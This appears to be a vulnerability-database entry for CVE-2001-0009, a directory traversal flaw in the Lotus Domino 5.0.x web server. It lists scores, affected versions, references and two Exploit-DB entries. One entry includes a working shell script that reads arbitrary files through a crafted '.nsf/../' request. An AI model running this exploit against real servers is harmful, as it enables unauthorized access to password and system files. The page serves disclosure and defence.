CVE-2001-0009
published 2001-02-12
CVE-2001-0009: Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
Priority P4 · 30 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS 9.34% (94.8th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
| lotus | domino_server | — | — |
No detection rules found.
Exploit-DB
Lotus Domino Server 5.0.x - Directory Traversal (1)
exploitdb·2001-01-15
---
source: https://www.securityfocus.com/bid/2173/info
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request composed of '.nsf' and '../' along with the known filename will display the contents of the particular file with read permissions.
Successful exploitation of this vulnerability could enable a remote user to gain access to system files, password files, etc. This could lead to a complete compromise of the host.
#!/usr/bin/perl
# PERL script to test a Domino server for directory
# traversal vulnerability. (BugTraq ID 2173,
# https://www.securityfocus.com/bid/2173)
#
# Michael Smith, http://www.netlocksmith.com
# 01/15/2001
#
#
Exploit-DB
Lotus Domino Server 5.0.x - Directory Traversal (2)
exploitdb·2001-01-05
---
source: https://www.securityfocus.com/bid/2173/info
#!/bin/sh
HOST=$1
PATH=$2
start()
{
/usr/bin/lynx -dump http://$HOST/.nsf/../$PATH
}
if [ -n "$HOST" ]; then
start
else
echo "$0 "
fi
No writeups or analysis indexed.
http://www.osvdb.org/1703
http://www.securityfocus.com/archive/1/154537
http://www.securityfocus.com/archive/1/155124
http://www.securityfocus.com/bid/2173
https://exchange.xforce.ibmcloud.com/vulnerabilities/5899